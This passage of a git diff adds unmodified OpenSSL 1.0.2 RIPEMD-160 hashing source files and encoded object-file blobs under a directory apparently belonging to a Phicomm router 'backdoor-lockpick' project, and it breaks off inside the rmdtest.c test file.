z#gP-hW~pgQB7^)FoCzPJ$q?}Mq9x}n^%0c_v1G|B+C#5|PxG5}&Z5wi(s_m@Dc&ec
zi(fl(+*X%taZ6s}5+ZKM&uAX;srn4Fz%aJFBxX?fJ$XfafXT#dxr&~JW}BB+Ep-)>
ziFr$Y;5&($5tM{62Q)PXRTUPv{KFncj@jZ9M~!g>;ML54mFBZ>j3ZYae5Fu5y1}&y
zlj0a=$`-Shn!?No6icp%EM~xbvvi21W-&V!$!s3YJz~kMLnG7=*MZHSdlafMu`T8>
z8NLC{w6@z2N7Hi|ozyQKdDX^h=tS&;%<(9W$>_{2jB`1hc8RNw%mYwfEaMDK9gk#=
z(?=fFA`Jy=>Ub2BFQV&$szqQtg5-KveXj;h8%}Lj3$xW|`q22@g_6%{CE}{v&}ggf
zdbQ`%+jllLo_)?bWj$y8xz)|bhN+*-)(!s(hln^hRCzb@5uHln2r;F;z$xO@?}R%V
z&V@HR8dK_H<us)9?cWn88#5<QK`#Arm)pCy%YF2>I^9S^YUsb8x=_(M^u<%>Ti-th
zB`GzL+CTFPI-p#AC#7(9x!R>}E#ehJpS)j>yY#x$uR7i5yb0$N(O2IkE$1J<(?G)N
z#_Bt^a8BKMlBxRvfz=#J0!D>VG@r`gedwl_61mj=vD8ogEnTOcJCz!`v=<7%zxvJ(
z_>k0J_t@5fDI@z--`?2Z<I@ve?u&bQ*_pRa0c*~Fa_^5*8xyIajicxPsMBqDf>%Y5
zZ>9F%OR4Mr(*7l-{++SN4Q4uO)^)3dCzWZ#s@hKYytHsO!9<%`c_yr!P^K-SoJgiE
zs+?%1twuRDnYQ|8l~d2K;khv~)6VPZ&Tl)9ebbhQTM}n`2Gfaw7Zb<N_Vz#XOjklS
zw=^F}95|5pMo)j@K#TlZDAdu`_IP67$>(3|PrsJ<dh@~NmdE6g*Z5Vwb)coW<<Neg
z9ExBna#T6~I=*!>R2B+(L<{4OE;^~EOT77XNW5Mz9;vB}{w+LCGJAO>6ne_skKx{8
zo{x}Vd%XUqWlp^DZ^Etdgd1s%@4HxT#arI4u;NFDD#Lpl;w@HuAI4hajji$e)_64Z
z1jN!t$2#4Q$Lrm)u6X0cuoX|d9kJv4hRW@DOWAmQUwb@Z1%lRC?(!9|6R!724p-d2
zh4$e-X`cU;?!a}CaJ?P2<B6e2+26$*JN@Ym*UlRSc_g&Fv2%oMMWZ{f@TL{FkA>Ol
z+iCO`W-shUuiQyw{^)(^vHQ>~cF=1;`AQM~z?bxI45A0`>`%}R8~S+@80;g^It=~n
z!+5|I*#22Olb*K>o$U|WEBJe;XuXf&ov*>Z)7__EI+t#KAw)6HA>ZBEe<mFoJae|U
z?=*Hm_w%m~yzol*>7H~?_rT!k-oYZylV?HhEh3y4?CC%E;=o{E5v~19f6uF-r+wY$
zdk4>*8R$3D-!bc=Jy4Cm&o}(*kilO{_wGZ#dmnnj%!7SKdu{VNWS#<gVE5Nc=z-lw
zO6Y;zFPG2*yN8<3z0sHMc^>!lpnrckcpB_|wWm4V`+7RmOg0TQKY#9AsCjU}e|ce`
zudlZsWBmi^-e%;8$IhjDUU<d4ztsO)^Vz|Hv%Q1qHy}frdSC8-aj>Va*C6@--4YO|
z-BlX7$3Ua&tH15vgWuAfNO4R)I~FjQ`{M8T4}W3a$=4(s?5IXV|6@ZB@}VJzepoVZ
zKrfyDQ4EmI|Es)&Ea@zc6}*OiZ06tGH$=ph;NPvEuj7&AgS;G!{M^X@NkB070Do|A
z1wD8!W}W|EuK#HWQT8guAIK+)mEt+De?a~r9%%kj`86~DQov~LrScSoyZJx$yS_lM
zzsUcTH3Rv;|GUjil8bxj7k)6tp*&iJzfyV9S?YU`LNA;6dy`&@u2Ne+gt6V^J%c}8
KBukH_^8W+tk_3<d

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_locl.h
new file mode 100644
index 0000000..26e0256
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_locl.h
@@ -0,0 +1,149 @@
+/* crypto/ripemd/rmd_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/opensslconf.h>
+#include <openssl/ripemd.h>
+
+#ifndef RIPEMD160_LONG_LOG2
+# define RIPEMD160_LONG_LOG2 2  /* default to 32 bits */
+#endif
+
+/*
+ * DO EXAMINE COMMENTS IN crypto/md5/md5_locl.h & crypto/md5/md5_dgst.c
+ * FOR EXPLANATIONS ON FOLLOWING "CODE."
+ *                                      <appro@fy.chalmers.se>
+ */
+#ifdef RMD160_ASM
+# if defined(__i386) || defined(__i386__) || defined(_M_IX86) || defined(__INTEL__)
+#  define ripemd160_block_data_order ripemd160_block_asm_data_order
+# endif
+#endif
+
+void ripemd160_block_data_order(RIPEMD160_CTX *c, const void *p, size_t num);
+
+#define DATA_ORDER_IS_LITTLE_ENDIAN
+
+#define HASH_LONG               RIPEMD160_LONG
+#define HASH_CTX                RIPEMD160_CTX
+#define HASH_CBLOCK             RIPEMD160_CBLOCK
+#define HASH_UPDATE             RIPEMD160_Update
+#define HASH_TRANSFORM          RIPEMD160_Transform
+#define HASH_FINAL              RIPEMD160_Final
+#define HASH_MAKE_STRING(c,s)   do {    \
+        unsigned long ll;               \
+        ll=(c)->A; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->B; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->C; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->D; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->E; (void)HOST_l2c(ll,(s));      \
+        } while (0)
+#define HASH_BLOCK_DATA_ORDER   ripemd160_block_data_order
+
+#include "md32_common.h"
+
+#if 0
+# define F1(x,y,z)        ((x)^(y)^(z))
+# define F2(x,y,z)       (((x)&(y))|((~x)&z))
+# define F3(x,y,z)       (((x)|(~y))^(z))
+# define F4(x,y,z)       (((x)&(z))|((y)&(~(z))))
+# define F5(x,y,z)        ((x)^((y)|(~(z))))
+#else
+/*
+ * Transformed F2 and F4 are courtesy of Wei Dai <weidai@eskimo.com>
+ */
+# define F1(x,y,z)       ((x) ^ (y) ^ (z))
+# define F2(x,y,z)       ((((y) ^ (z)) & (x)) ^ (z))
+# define F3(x,y,z)       (((~(y)) | (x)) ^ (z))
+# define F4(x,y,z)       ((((x) ^ (y)) & (z)) ^ (y))
+# define F5(x,y,z)       (((~(z)) | (y)) ^ (x))
+#endif
+
+#define RIPEMD160_A     0x67452301L
+#define RIPEMD160_B     0xEFCDAB89L
+#define RIPEMD160_C     0x98BADCFEL
+#define RIPEMD160_D     0x10325476L
+#define RIPEMD160_E     0xC3D2E1F0L
+
+#include "rmdconst.h"
+
+#define RIP1(a,b,c,d,e,w,s) { \
+        a+=F1(b,c,d)+X(w); \
+        a=ROTATE(a,s)+e; \
+        c=ROTATE(c,10); }
+
+#define RIP2(a,b,c,d,e,w,s,K) { \
+        a+=F2(b,c,d)+X(w)+K; \
+        a=ROTATE(a,s)+e; \
+        c=ROTATE(c,10); }
+
+#define RIP3(a,b,c,d,e,w,s,K) { \
+        a+=F3(b,c,d)+X(w)+K; \
+        a=ROTATE(a,s)+e; \
+        c=ROTATE(c,10); }
+
+#define RIP4(a,b,c,d,e,w,s,K) { \
+        a+=F4(b,c,d)+X(w)+K; \
+        a=ROTATE(a,s)+e; \
+        c=ROTATE(c,10); }
+
+#define RIP5(a,b,c,d,e,w,s,K) { \
+        a+=F5(b,c,d)+X(w)+K; \
+        a=ROTATE(a,s)+e; \
+        c=ROTATE(c,10); }
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.c
new file mode 100644
index 0000000..666e01a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.c
@@ -0,0 +1,77 @@
+/* crypto/ripemd/rmd_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/ripemd.h>
+#include <openssl/crypto.h>
+
+unsigned char *RIPEMD160(const unsigned char *d, size_t n, unsigned char *md)
+{
+    RIPEMD160_CTX c;
+    static unsigned char m[RIPEMD160_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!RIPEMD160_Init(&c))
+        return NULL;
+    RIPEMD160_Update(&c, d, n);
+    RIPEMD160_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c)); /* security consideration */
+    return (md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmd_one.o
new file mode 100644
index 0000000000000000000000000000000000000000..8c07757e68f4137d23cd0bb69c5d3966fb9bc9b8
GIT binary patch
literal 2048
zcmbu9-D}fO6u@tm&P}&vb^0)vNFFw+=t4ilkD=0ZO_xfvV_QYU8Phgf$J%tXDRe$4
zGA4#O*@F*0`siOF1N{qRf509D1!baw52DO_l6$+mkUn|B<(%_7A2;{j+&osaOc%!?
zDjd3w4m?T`+72DqN!LuG0o0Fv4xauk-_AO}<b2loE6-`0V-U@&YhPO>bt5zu!Jg`*
zN6WEob^U|QXPq5&vohMNI^RA+=K8iB(VQQevqy>Q>}k#?H~98}TkU0j;g#4&bpy95
zsR^&K-R-8SYwuf{vpX-}ljr68@1Sj4rY0vR#7Mr-wCtvMMM_A~@z|xN>&70%qf+$3
zSr2;^u*@(X-FQsh%A+o_blwZ2lSFe5XAsv4b0hsdy<2$0u3~<Q#9o5V2;mo9iZHy%
zD}wkuqzaLz-D%-9*HslFX+ca0!zm%05_(BZCk1B_Lf`j;;(XvqA;jY+NO;`IFMSwr
z45#aZJRTkKr@KCndOGmn)$s0a9xfTe?hy0-?w(-=dkFjQmpBGNT<*YUI`BdVUhlwB
zy;{<1mMIlcRZ7GYaWs>iR&J(a7o$j@(sC(T({q{3tTLz1$tg|I58`^(TCy28zfv-6
zlL46}%c!8-v~p{9R?~|W)36#Q()EUI6qog4d0AgDmMZwgu$=G|e2?yF{n_{A8sTuV
z{diEGWB35W?=oCq_#(px8UBRfu>Z8bNI1L?jJ8OP)v9e2kkqj2o-R|XZdMG*Hd{85
z@J<*=Dl{5MD%Pr1)56TE*`|c=+_<}b;xAfFX{BCUG3)j!lH3kvSzo9dRkJ<i{}>`J
zhCAl}(vz5h(C^aoyj*I79>D|lK8Xh_Z^#wgBJdd2Fb};U!-St9+<#+tNZhZW2P@~X
z13mrqyCjLd&w%`QD25sIj6#r+U1FbO7?^Z^swWu6ruNYU76#<rzzqH-hrS`~he^GN
zZC2?1QC7ePr26Zlr2Y;~B-&p;k9pAfT_(RudQNbDP)qA651JdMdPe4dMKt_pX%C3g
i`lHzPpB=<S0@uJ{gtTju<JbzSpC<25ejn|8fBioUirwu1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdconst.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdconst.h
new file mode 100644
index 0000000..8fe33de
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdconst.h
@@ -0,0 +1,398 @@
+/* crypto/ripemd/rmdconst.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+#define KL0 0x00000000L
+#define KL1 0x5A827999L
+#define KL2 0x6ED9EBA1L
+#define KL3 0x8F1BBCDCL
+#define KL4 0xA953FD4EL
+
+#define KR0 0x50A28BE6L
+#define KR1 0x5C4DD124L
+#define KR2 0x6D703EF3L
+#define KR3 0x7A6D76E9L
+#define KR4 0x00000000L
+
+#define WL00  0
+#define SL00 11
+#define WL01  1
+#define SL01 14
+#define WL02  2
+#define SL02 15
+#define WL03  3
+#define SL03 12
+#define WL04  4
+#define SL04  5
+#define WL05  5
+#define SL05  8
+#define WL06  6
+#define SL06  7
+#define WL07  7
+#define SL07  9
+#define WL08  8
+#define SL08 11
+#define WL09  9
+#define SL09 13
+#define WL10 10
+#define SL10 14
+#define WL11 11
+#define SL11 15
+#define WL12 12
+#define SL12  6
+#define WL13 13
+#define SL13  7
+#define WL14 14
+#define SL14  9
+#define WL15 15
+#define SL15  8
+
+#define WL16  7
+#define SL16  7
+#define WL17  4
+#define SL17  6
+#define WL18 13
+#define SL18  8
+#define WL19  1
+#define SL19 13
+#define WL20 10
+#define SL20 11
+#define WL21  6
+#define SL21  9
+#define WL22 15
+#define SL22  7
+#define WL23  3
+#define SL23 15
+#define WL24 12
+#define SL24  7
+#define WL25  0
+#define SL25 12
+#define WL26  9
+#define SL26 15
+#define WL27  5
+#define SL27  9
+#define WL28  2
+#define SL28 11
+#define WL29 14
+#define SL29  7
+#define WL30 11
+#define SL30 13
+#define WL31  8
+#define SL31 12
+
+#define WL32  3
+#define SL32 11
+#define WL33 10
+#define SL33 13
+#define WL34 14
+#define SL34  6
+#define WL35  4
+#define SL35  7
+#define WL36  9
+#define SL36 14
+#define WL37 15
+#define SL37  9
+#define WL38  8
+#define SL38 13
+#define WL39  1
+#define SL39 15
+#define WL40  2
+#define SL40 14
+#define WL41  7
+#define SL41  8
+#define WL42  0
+#define SL42 13
+#define WL43  6
+#define SL43  6
+#define WL44 13
+#define SL44  5
+#define WL45 11
+#define SL45 12
+#define WL46  5
+#define SL46  7
+#define WL47 12
+#define SL47  5
+
+#define WL48  1
+#define SL48 11
+#define WL49  9
+#define SL49 12
+#define WL50 11
+#define SL50 14
+#define WL51 10
+#define SL51 15
+#define WL52  0
+#define SL52 14
+#define WL53  8
+#define SL53 15
+#define WL54 12
+#define SL54  9
+#define WL55  4
+#define SL55  8
+#define WL56 13
+#define SL56  9
+#define WL57  3
+#define SL57 14
+#define WL58  7
+#define SL58  5
+#define WL59 15
+#define SL59  6
+#define WL60 14
+#define SL60  8
+#define WL61  5
+#define SL61  6
+#define WL62  6
+#define SL62  5
+#define WL63  2
+#define SL63 12
+
+#define WL64  4
+#define SL64  9
+#define WL65  0
+#define SL65 15
+#define WL66  5
+#define SL66  5
+#define WL67  9
+#define SL67 11
+#define WL68  7
+#define SL68  6
+#define WL69 12
+#define SL69  8
+#define WL70  2
+#define SL70 13
+#define WL71 10
+#define SL71 12
+#define WL72 14
+#define SL72  5
+#define WL73  1
+#define SL73 12
+#define WL74  3
+#define SL74 13
+#define WL75  8
+#define SL75 14
+#define WL76 11
+#define SL76 11
+#define WL77  6
+#define SL77  8
+#define WL78 15
+#define SL78  5
+#define WL79 13
+#define SL79  6
+
+#define WR00  5
+#define SR00  8
+#define WR01 14
+#define SR01  9
+#define WR02  7
+#define SR02  9
+#define WR03  0
+#define SR03 11
+#define WR04  9
+#define SR04 13
+#define WR05  2
+#define SR05 15
+#define WR06 11
+#define SR06 15
+#define WR07  4
+#define SR07  5
+#define WR08 13
+#define SR08  7
+#define WR09  6
+#define SR09  7
+#define WR10 15
+#define SR10  8
+#define WR11  8
+#define SR11 11
+#define WR12  1
+#define SR12 14
+#define WR13 10
+#define SR13 14
+#define WR14  3
+#define SR14 12
+#define WR15 12
+#define SR15  6
+
+#define WR16  6
+#define SR16  9
+#define WR17 11
+#define SR17 13
+#define WR18  3
+#define SR18 15
+#define WR19  7
+#define SR19  7
+#define WR20  0
+#define SR20 12
+#define WR21 13
+#define SR21  8
+#define WR22  5
+#define SR22  9
+#define WR23 10
+#define SR23 11
+#define WR24 14
+#define SR24  7
+#define WR25 15
+#define SR25  7
+#define WR26  8
+#define SR26 12
+#define WR27 12
+#define SR27  7
+#define WR28  4
+#define SR28  6
+#define WR29  9
+#define SR29 15
+#define WR30  1
+#define SR30 13
+#define WR31  2
+#define SR31 11
+
+#define WR32 15
+#define SR32  9
+#define WR33  5
+#define SR33  7
+#define WR34  1
+#define SR34 15
+#define WR35  3
+#define SR35 11
+#define WR36  7
+#define SR36  8
+#define WR37 14
+#define SR37  6
+#define WR38  6
+#define SR38  6
+#define WR39  9
+#define SR39 14
+#define WR40 11
+#define SR40 12
+#define WR41  8
+#define SR41 13
+#define WR42 12
+#define SR42  5
+#define WR43  2
+#define SR43 14
+#define WR44 10
+#define SR44 13
+#define WR45  0
+#define SR45 13
+#define WR46  4
+#define SR46  7
+#define WR47 13
+#define SR47  5
+
+#define WR48  8
+#define SR48 15
+#define WR49  6
+#define SR49  5
+#define WR50  4
+#define SR50  8
+#define WR51  1
+#define SR51 11
+#define WR52  3
+#define SR52 14
+#define WR53 11
+#define SR53 14
+#define WR54 15
+#define SR54  6
+#define WR55  0
+#define SR55 14
+#define WR56  5
+#define SR56  6
+#define WR57 12
+#define SR57  9
+#define WR58  2
+#define SR58 12
+#define WR59 13
+#define SR59  9
+#define WR60  9
+#define SR60 12
+#define WR61  7
+#define SR61  5
+#define WR62 10
+#define SR62 15
+#define WR63 14
+#define SR63  8
+
+#define WR64 12
+#define SR64  8
+#define WR65 15
+#define SR65  5
+#define WR66 10
+#define SR66 12
+#define WR67  4
+#define SR67  9
+#define WR68  1
+#define SR68 12
+#define WR69  5
+#define SR69  5
+#define WR70  8
+#define SR70 14
+#define WR71  7
+#define SR71  6
+#define WR72  6
+#define SR72  8
+#define WR73  2
+#define SR73 13
+#define WR74 13
+#define SR74  6
+#define WR75 14
+#define SR75  5
+#define WR76  0
+#define SR76 15
+#define WR77  3
+#define SR77 13
+#define WR78  9
+#define SR78 11
+#define WR79 11
+#define SR79 11
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdtest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdtest.c
new file mode 100644
index 0000000..95f6f46
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/rmdtest.c
@@ -0,0 +1,143 @@
+/* crypto/ripemd/rmdtest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_RIPEMD
+int main(int argc, char *argv[])
+{
+    printf("No ripemd support\n");
+    return (0);
+}
+#else
+# include <openssl/ripemd.h>
+# include <openssl/evp.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
